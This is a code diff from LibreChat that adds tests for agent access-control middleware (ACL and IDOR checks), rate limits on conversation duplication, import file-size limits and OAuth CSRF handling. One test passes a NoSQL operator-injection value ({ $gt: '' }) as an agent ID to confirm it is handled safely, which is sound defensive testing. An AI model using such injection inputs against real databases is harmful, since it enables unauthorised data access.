-        resourceIdParam: 'agent_id', // This will be ignored since we use custom resolver
-        idResolver: () => resolveAgentIdFromBody(agentId),
-      });
-
-      const tempReq = {
-        ...req,
-        params: {
-          ...req.params,
-          agent_id: agentId,
-        },
-      };
-
-      return agentAccessMiddleware(tempReq, res, next);
+      return checkAgentResourceAccess(agentId, requiredPermission, req, res, afterPrimaryCheck);
     } catch (error) {
       logger.error('Failed to validate agent access permissions', error);
       return res.status(500).json({


@@ -0,0 +1,509 @@
const mongoose = require('mongoose');
const {
ResourceType,
SystemRoles,
PrincipalType,
PrincipalModel,
} = require('librechat-data-provider');
const { MongoMemoryServer } = require('mongodb-memory-server');
const { canAccessAgentFromBody } = require('./canAccessAgentFromBody');
const { User, Role, AclEntry } = require('~/db/models');
const { createAgent } = require('~/models/Agent');
describe('canAccessAgentFromBody middleware', () => {
let mongoServer;
let req, res, next;
let testUser, otherUser;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
await mongoose.connect(mongoServer.getUri());
});
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await mongoose.connection.dropDatabase();
await Role.create({
name: 'test-role',
permissions: {
AGENTS: { USE: true, CREATE: true, SHARE: true },
MULTI_CONVO: { USE: true },
},
});
await Role.create({
name: 'no-multi-convo',
permissions: {
AGENTS: { USE: true, CREATE: true, SHARE: true },
MULTI_CONVO: { USE: false },
},
});
await Role.create({
name: SystemRoles.ADMIN,
permissions: {
AGENTS: { USE: true, CREATE: true, SHARE: true },
MULTI_CONVO: { USE: true },
},
});
testUser = await User.create({
email: 'test@example.com',
name: 'Test User',
username: 'testuser',
role: 'test-role',
});
otherUser = await User.create({
email: 'other@example.com',
name: 'Other User',
username: 'otheruser',
role: 'test-role',
});
req = {
user: { id: testUser._id, role: testUser.role },
params: {},
body: {
endpoint: 'agents',
agent_id: 'ephemeral_primary',
},
};
res = {
status: jest.fn().mockReturnThis(),
json: jest.fn(),
};
next = jest.fn();
jest.clearAllMocks();
});
describe('middleware factory', () => {
test('throws if requiredPermission is missing', () => {
expect(() => canAccessAgentFromBody({})).toThrow(
'canAccessAgentFromBody: requiredPermission is required and must be a number',
);
});
test('throws if requiredPermission is not a number', () => {
expect(() => canAccessAgentFromBody({ requiredPermission: '1' })).toThrow(
'canAccessAgentFromBody: requiredPermission is required and must be a number',
);
});
test('returns a middleware function', () => {
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
expect(typeof middleware).toBe('function');
expect(middleware.length).toBe(3);
});
});
describe('primary agent checks', () => {
test('returns 400 when agent_id is missing on agents endpoint', async () => {
req.body.agent_id = undefined;
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(400);
});
test('proceeds for ephemeral primary agent without addedConvo', async () => {
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
});
test('proceeds for non-agents endpoint (ephemeral fallback)', async () => {
req.body.endpoint = 'openAI';
req.body.agent_id = undefined;
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
});
describe('addedConvo — absent or invalid shape', () => {
test('calls next when addedConvo is absent', async () => {
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
test('calls next when addedConvo is a string', async () => {
req.body.addedConvo = 'not-an-object';
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
test('calls next when addedConvo is an array', async () => {
req.body.addedConvo = [{ agent_id: 'agent_something' }];
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
});
describe('addedConvo — MULTI_CONVO permission gate', () => {
test('returns 403 when user lacks MULTI_CONVO:USE', async () => {
req.user.role = 'no-multi-convo';
req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
expect(res.json).toHaveBeenCalledWith(
expect.objectContaining({ message: 'Multi-conversation feature is not enabled' }),
);
});
test('returns 403 when user.role is missing', async () => {
req.user = { id: testUser._id };
req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
test('ADMIN bypasses MULTI_CONVO check', async () => {
req.user.role = SystemRoles.ADMIN;
req.body.addedConvo = { agent_id: 'ephemeral_x', endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
});
});
describe('addedConvo — agent_id shape validation', () => {
test('calls next when agent_id is ephemeral', async () => {
req.body.addedConvo = { agent_id: 'ephemeral_xyz', endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
test('calls next when agent_id is absent', async () => {
req.body.addedConvo = { endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
test('calls next when agent_id is not a string (object injection)', async () => {
req.body.addedConvo = { agent_id: { $gt: '' }, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
});
describe('addedConvo — agent resource ACL (IDOR prevention)', () => {
let addedAgent;
beforeEach(async () => {
addedAgent = await createAgent({
id: `agent_added_${Date.now()}`,
name: 'Private Agent',
provider: 'openai',
model: 'gpt-4',
author: otherUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: otherUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 15,
grantedBy: otherUser._id,
});
});
test('returns 403 when requester has no ACL for the added agent', async () => {
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
expect(res.json).toHaveBeenCalledWith(
expect.objectContaining({
message: 'Insufficient permissions to access this agent',
}),
);
});
test('returns 404 when added agent does not exist', async () => {
req.body.addedConvo = {
agent_id: 'agent_nonexistent_999',
endpoint: 'agents',
model: 'gpt-4',
};
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(404);
});
test('proceeds when requester has ACL for the added agent', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
});
test('denies when ACL permission bits are insufficient', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 2 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
test('caches resolved agent on req.resolvedAddedAgent', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(req.resolvedAddedAgent).toBeDefined();
expect(req.resolvedAddedAgent._id.toString()).toBe(addedAgent._id.toString());
});
test('ADMIN bypasses agent resource ACL for addedConvo', async () => {
req.user.role = SystemRoles.ADMIN;
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
expect(req.resolvedAddedAgent).toBeUndefined();
});
});
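The ACL assertions above rely on bitmask semantics: `permBits: 15` grants all four permission bits, while `permBits: 1` satisfies `requiredPermission: 1` but is denied for `requiredPermission: 2`. A hedged sketch of the check these tests imply — the real helper name and bit layout are not shown in this diff:

```javascript
// Hypothetical bitmask check consistent with the test matrix above:
// access is granted only when every required bit is present in permBits.
const hasRequiredBits = (permBits, requiredPermission) =>
  (permBits & requiredPermission) === requiredPermission;
```

Under this reading, `permBits: 1` against `requiredPermission: 2` fails (`1 & 2 === 0`), matching the 403 the "insufficient permission bits" test expects.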
describe('end-to-end: primary real agent + addedConvo real agent', () => {
let primaryAgent, addedAgent;
beforeEach(async () => {
primaryAgent = await createAgent({
id: `agent_primary_${Date.now()}`,
name: 'Primary Agent',
provider: 'openai',
model: 'gpt-4',
author: testUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: primaryAgent._id,
permBits: 15,
grantedBy: testUser._id,
});
addedAgent = await createAgent({
id: `agent_added_${Date.now()}`,
name: 'Added Agent',
provider: 'openai',
model: 'gpt-4',
author: otherUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: otherUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 15,
grantedBy: otherUser._id,
});
req.body.agent_id = primaryAgent.id;
});
test('both checks pass when user has ACL for both agents', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
expect(req.resolvedAddedAgent).toBeDefined();
});
test('primary passes but addedConvo denied → 403', async () => {
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
test('primary denied → 403 without reaching addedConvo check', async () => {
const foreignAgent = await createAgent({
id: `agent_foreign_${Date.now()}`,
name: 'Foreign Agent',
provider: 'openai',
model: 'gpt-4',
author: otherUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: otherUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: foreignAgent._id,
permBits: 15,
grantedBy: otherUser._id,
});
req.body.agent_id = foreignAgent.id;
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
});
describe('ephemeral primary + real addedConvo agent', () => {
let addedAgent;
beforeEach(async () => {
addedAgent = await createAgent({
id: `agent_added_${Date.now()}`,
name: 'Added Agent',
provider: 'openai',
model: 'gpt-4',
author: otherUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: otherUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 15,
grantedBy: otherUser._id,
});
});
test('runs full addedConvo ACL check even when primary is ephemeral', async () => {
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
test('proceeds when user has ACL for added agent (ephemeral primary)', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
});
});
});


@@ -48,7 +48,7 @@ const createForkHandler = (ip = true) => {
     };

     await logViolation(req, res, type, errorMessage, forkViolationScore);
-    res.status(429).json({ message: 'Too many conversation fork requests. Try again later' });
+    res.status(429).json({ message: 'Too many requests. Try again later' });
   };
 };


@@ -0,0 +1,93 @@
module.exports = {
agents: () => ({ sleep: jest.fn() }),
api: (overrides = {}) => ({
isEnabled: jest.fn(),
resolveImportMaxFileSize: jest.fn(() => 262144000),
createAxiosInstance: jest.fn(() => ({
get: jest.fn(),
post: jest.fn(),
put: jest.fn(),
delete: jest.fn(),
})),
logAxiosError: jest.fn(),
...overrides,
}),
dataSchemas: () => ({
logger: {
debug: jest.fn(),
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
},
createModels: jest.fn(() => ({
User: {},
Conversation: {},
Message: {},
SharedLink: {},
})),
}),
dataProvider: (overrides = {}) => ({
CacheKeys: { GEN_TITLE: 'GEN_TITLE' },
EModelEndpoint: {
azureAssistants: 'azureAssistants',
assistants: 'assistants',
},
...overrides,
}),
conversationModel: () => ({
getConvosByCursor: jest.fn(),
getConvo: jest.fn(),
deleteConvos: jest.fn(),
saveConvo: jest.fn(),
}),
toolCallModel: () => ({ deleteToolCalls: jest.fn() }),
sharedModels: () => ({
deleteAllSharedLinks: jest.fn(),
deleteConvoSharedLink: jest.fn(),
}),
requireJwtAuth: () => (req, res, next) => next(),
middlewarePassthrough: () => ({
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters: jest.fn(() => ({
forkIpLimiter: (req, res, next) => next(),
forkUserLimiter: (req, res, next) => next(),
})),
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
}),
forkUtils: () => ({
forkConversation: jest.fn(),
duplicateConversation: jest.fn(),
}),
importUtils: () => ({ importConversations: jest.fn() }),
logStores: () => jest.fn(),
multerSetup: () => ({
storage: {},
importFileFilter: jest.fn(),
}),
multerLib: () =>
jest.fn(() => ({
single: jest.fn(() => (req, res, next) => {
req.file = { path: '/tmp/test-file.json' };
next();
}),
})),
assistantEndpoint: () => ({ initializeClient: jest.fn() }),
};
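Several factories above (`api`, `dataProvider`) accept an `overrides` object that is spread last, so a spec can swap a single export while keeping the rest of the defaults. The pattern in isolation, with illustrative stub values rather than the factory's real ones:

```javascript
// Same shallow-merge pattern as the api()/dataProvider() factories above:
// defaults first, caller overrides spread last so they win on key conflicts.
const makeApiMock = (overrides = {}) => ({
  isEnabled: () => false, // default stub
  logAxiosError: () => {}, // default stub
  ...overrides,
});
```

This is how the rate-limit spec below injects `limiterCache` into the shared `api()` mock without redefining every other export.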


@@ -0,0 +1,135 @@
const express = require('express');
const request = require('supertest');
const MOCKS = '../__test-utils__/convos-route-mocks';
jest.mock('@librechat/agents', () => require(MOCKS).agents());
jest.mock('@librechat/api', () => require(MOCKS).api({ limiterCache: jest.fn(() => undefined) }));
jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
jest.mock('librechat-data-provider', () =>
require(MOCKS).dataProvider({ ViolationTypes: { FILE_UPLOAD_LIMIT: 'file_upload_limit' } }),
);
jest.mock('~/cache/logViolation', () => jest.fn().mockResolvedValue(undefined));
jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
jest.mock('~/models', () => require(MOCKS).sharedModels());
jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
jest.mock('~/server/middleware', () => {
const { createForkLimiters } = jest.requireActual('~/server/middleware/limiters/forkLimiters');
return {
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters,
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
};
});
jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
jest.mock('multer', () => require(MOCKS).multerLib());
jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
describe('POST /api/convos/duplicate - Rate Limiting', () => {
let app;
let duplicateConversation;
const savedEnv = {};
beforeAll(() => {
savedEnv.FORK_USER_MAX = process.env.FORK_USER_MAX;
savedEnv.FORK_USER_WINDOW = process.env.FORK_USER_WINDOW;
savedEnv.FORK_IP_MAX = process.env.FORK_IP_MAX;
savedEnv.FORK_IP_WINDOW = process.env.FORK_IP_WINDOW;
});
afterAll(() => {
for (const key of Object.keys(savedEnv)) {
if (savedEnv[key] === undefined) {
delete process.env[key];
} else {
process.env[key] = savedEnv[key];
}
}
});
const setupApp = () => {
jest.clearAllMocks();
jest.isolateModules(() => {
const convosRouter = require('../convos');
({ duplicateConversation } = require('~/server/utils/import/fork'));
app = express();
app.use(express.json());
app.use((req, res, next) => {
req.user = { id: 'rate-limit-test-user' };
next();
});
app.use('/api/convos', convosRouter);
});
duplicateConversation.mockResolvedValue({
conversation: { conversationId: 'duplicated-conv' },
});
};
describe('user limit', () => {
beforeEach(() => {
process.env.FORK_USER_MAX = '2';
process.env.FORK_USER_WINDOW = '1';
process.env.FORK_IP_MAX = '100';
process.env.FORK_IP_WINDOW = '1';
setupApp();
});
it('should return 429 after exceeding the user rate limit', async () => {
const userMax = parseInt(process.env.FORK_USER_MAX, 10);
for (let i = 0; i < userMax; i++) {
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(201);
}
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(429);
expect(res.body.message).toMatch(/too many/i);
});
});
describe('IP limit', () => {
beforeEach(() => {
process.env.FORK_USER_MAX = '100';
process.env.FORK_USER_WINDOW = '1';
process.env.FORK_IP_MAX = '2';
process.env.FORK_IP_WINDOW = '1';
setupApp();
});
it('should return 429 after exceeding the IP rate limit', async () => {
const ipMax = parseInt(process.env.FORK_IP_MAX, 10);
for (let i = 0; i < ipMax; i++) {
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(201);
}
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(429);
expect(res.body.message).toMatch(/too many/i);
});
});
});
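The specs above drive the limiter entirely through `FORK_USER_MAX` / `FORK_USER_WINDOW` (and the IP equivalents). A sketch of the presumed env parsing, where the window value is in minutes converted to milliseconds; the fallback defaults here are assumptions for illustration, not values taken from the source:

```javascript
// Assumed shape: MAX is a request count, WINDOW is minutes converted to ms.
// The fallback values below are illustrative, not LibreChat's real defaults.
function resolveForkLimits(env) {
  const max = parseInt(env.FORK_USER_MAX ?? '7', 10);
  const windowMs = parseInt(env.FORK_USER_WINDOW ?? '1', 10) * 60 * 1000;
  return { max, windowMs };
}
```

Setting `FORK_USER_MAX=2` and `FORK_USER_WINDOW=1`, as the user-limit test does, would then allow two requests per one-minute window before the 429.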


@@ -0,0 +1,98 @@
const express = require('express');
const request = require('supertest');
const multer = require('multer');
const importFileFilter = (req, file, cb) => {
if (file.mimetype === 'application/json') {
cb(null, true);
} else {
cb(new Error('Only JSON files are allowed'), false);
}
};
/** Proxy app that mirrors the production multer + error-handling pattern */
function createImportApp(fileSize) {
const app = express();
const upload = multer({
storage: multer.memoryStorage(),
fileFilter: importFileFilter,
limits: { fileSize },
});
const uploadSingle = upload.single('file');
function handleUpload(req, res, next) {
uploadSingle(req, res, (err) => {
if (err && err.code === 'LIMIT_FILE_SIZE') {
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
}
if (err) {
return next(err);
}
next();
});
}
app.post('/import', handleUpload, (req, res) => {
res.status(201).json({ message: 'success', size: req.file.size });
});
app.use((err, _req, res, _next) => {
res.status(400).json({ error: err.message });
});
return app;
}
describe('Conversation Import - Multer File Size Limits', () => {
describe('multer rejects files exceeding the configured limit', () => {
it('returns 413 for files larger than the limit', async () => {
const limit = 1024;
const app = createImportApp(limit);
const oversized = Buffer.alloc(limit + 512, 'x');
const res = await request(app)
.post('/import')
.attach('file', oversized, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(413);
expect(res.body.message).toBe('File exceeds the maximum allowed size');
});
it('accepts files within the limit', async () => {
const limit = 4096;
const app = createImportApp(limit);
const valid = Buffer.from(JSON.stringify({ title: 'test' }));
const res = await request(app)
.post('/import')
.attach('file', valid, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(201);
expect(res.body.message).toBe('success');
});
it('rejects at the exact boundary (limit + 1 byte)', async () => {
const limit = 512;
const app = createImportApp(limit);
const boundary = Buffer.alloc(limit + 1, 'a');
const res = await request(app)
.post('/import')
.attach('file', boundary, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(413);
});
it('accepts a file just under the limit', async () => {
const limit = 512;
const app = createImportApp(limit);
const underLimit = Buffer.alloc(limit - 1, 'b');
const res = await request(app)
.post('/import')
.attach('file', underLimit, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(201);
});
});
});
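The mock module earlier in this diff stubs `resolveImportMaxFileSize` to `262144000`; a quick check confirms that figure is exactly a 250 MB cap:

```javascript
// 250 MB expressed in bytes matches the stubbed resolveImportMaxFileSize value.
const importCapBytes = 250 * 1024 * 1024;
console.log(importCapBytes); // → 262144000
```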


@@ -1,109 +1,24 @@
 const express = require('express');
 const request = require('supertest');
-jest.mock('@librechat/agents', () => ({
-  sleep: jest.fn(),
-}));
-jest.mock('@librechat/api', () => ({
-  isEnabled: jest.fn(),
-  createAxiosInstance: jest.fn(() => ({
-    get: jest.fn(),
-    post: jest.fn(),
-    put: jest.fn(),
-    delete: jest.fn(),
-  })),
-  logAxiosError: jest.fn(),
-}));
-jest.mock('@librechat/data-schemas', () => ({
-  logger: {
-    debug: jest.fn(),
-    info: jest.fn(),
-    warn: jest.fn(),
-    error: jest.fn(),
-  },
-  createModels: jest.fn(() => ({
-    User: {},
-    Conversation: {},
-    Message: {},
-    SharedLink: {},
-  })),
-}));
-jest.mock('~/models/Conversation', () => ({
-  getConvosByCursor: jest.fn(),
-  getConvo: jest.fn(),
-  deleteConvos: jest.fn(),
-  saveConvo: jest.fn(),
-}));
-jest.mock('~/models/ToolCall', () => ({
-  deleteToolCalls: jest.fn(),
-}));
-jest.mock('~/models', () => ({
-  deleteAllSharedLinks: jest.fn(),
-  deleteConvoSharedLink: jest.fn(),
-}));
-jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
-jest.mock('~/server/middleware', () => ({
-  createImportLimiters: jest.fn(() => ({
-    importIpLimiter: (req, res, next) => next(),
-    importUserLimiter: (req, res, next) => next(),
-  })),
-  createForkLimiters: jest.fn(() => ({
-    forkIpLimiter: (req, res, next) => next(),
-    forkUserLimiter: (req, res, next) => next(),
-  })),
-  configMiddleware: (req, res, next) => next(),
-  validateConvoAccess: (req, res, next) => next(),
-}));
-jest.mock('~/server/utils/import/fork', () => ({
-  forkConversation: jest.fn(),
-  duplicateConversation: jest.fn(),
-}));
-jest.mock('~/server/utils/import', () => ({
-  importConversations: jest.fn(),
-}));
-jest.mock('~/cache/getLogStores', () => jest.fn());
-jest.mock('~/server/routes/files/multer', () => ({
-  storage: {},
-  importFileFilter: jest.fn(),
-}));
-jest.mock('multer', () => {
-  return jest.fn(() => ({
-    single: jest.fn(() => (req, res, next) => {
-      req.file = { path: '/tmp/test-file.json' };
-      next();
-    }),
-  }));
-});
-jest.mock('librechat-data-provider', () => ({
-  CacheKeys: {
-    GEN_TITLE: 'GEN_TITLE',
-  },
-  EModelEndpoint: {
-    azureAssistants: 'azureAssistants',
-    assistants: 'assistants',
-  },
-}));
-jest.mock('~/server/services/Endpoints/azureAssistants', () => ({
-  initializeClient: jest.fn(),
-}));
-jest.mock('~/server/services/Endpoints/assistants', () => ({
-  initializeClient: jest.fn(),
-}));
+const MOCKS = '../__test-utils__/convos-route-mocks';
+jest.mock('@librechat/agents', () => require(MOCKS).agents());
+jest.mock('@librechat/api', () => require(MOCKS).api());
+jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
+jest.mock('librechat-data-provider', () => require(MOCKS).dataProvider());
+jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
+jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
+jest.mock('~/models', () => require(MOCKS).sharedModels());
+jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
+jest.mock('~/server/middleware', () => require(MOCKS).middlewarePassthrough());
+jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
+jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
+jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
+jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
+jest.mock('multer', () => require(MOCKS).multerLib());
+jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
+jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());

 describe('Convos Routes', () => {
   let app;


@@ -32,6 +32,9 @@ jest.mock('@librechat/api', () => {
     getFlowState: jest.fn(),
     completeOAuthFlow: jest.fn(),
     generateFlowId: jest.fn(),
+    resolveStateToFlowId: jest.fn(async (state) => state),
+    storeStateMapping: jest.fn(),
+    deleteStateMapping: jest.fn(),
   },
   MCPTokenStorage: {
     storeTokens: jest.fn(),
@@ -180,7 +183,10 @@ describe('MCP Routes', () => {
     MCPOAuthHandler.initiateOAuthFlow.mockResolvedValue({
       authorizationUrl: 'https://oauth.example.com/auth',
       flowId: 'test-user-id:test-server',
+      flowMetadata: { state: 'random-state-value' },
     });
+    MCPOAuthHandler.storeStateMapping.mockResolvedValue();
+    mockFlowManager.initFlow = jest.fn().mockResolvedValue();

     const response = await request(app).get('/api/mcp/test-server/oauth/initiate').query({
       userId: 'test-user-id',
@@ -367,6 +373,121 @@ describe('MCP Routes', () => {
     expect(response.headers.location).toBe(`${basePath}/oauth/error?error=invalid_state`);
   });
describe('CSRF fallback via active PENDING flow', () => {
it('should proceed when a fresh PENDING flow exists and no cookies are present', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'PENDING',
createdAt: Date.now(),
}),
completeFlow: jest.fn().mockResolvedValue(true),
deleteFlow: jest.fn().mockResolvedValue(true),
};
const mockFlowState = {
serverName: 'test-server',
userId: 'test-user-id',
metadata: {},
clientInfo: {},
codeVerifier: 'test-verifier',
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
MCPOAuthHandler.getFlowState.mockResolvedValue(mockFlowState);
MCPOAuthHandler.completeOAuthFlow.mockResolvedValue({
access_token: 'test-token',
});
MCPTokenStorage.storeTokens.mockResolvedValue();
mockRegistryInstance.getServerConfig.mockResolvedValue({});
const mockMcpManager = {
getUserConnection: jest.fn().mockResolvedValue({
fetchTools: jest.fn().mockResolvedValue([]),
}),
};
require('~/config').getMCPManager.mockReturnValue(mockMcpManager);
require('~/config').getOAuthReconnectionManager.mockReturnValue({
clearReconnection: jest.fn(),
});
require('~/server/services/Config/mcp').updateMCPServerTools.mockResolvedValue();
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toContain(`${basePath}/oauth/success`);
});
it('should reject when no PENDING flow exists and no cookies are present', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue(null),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
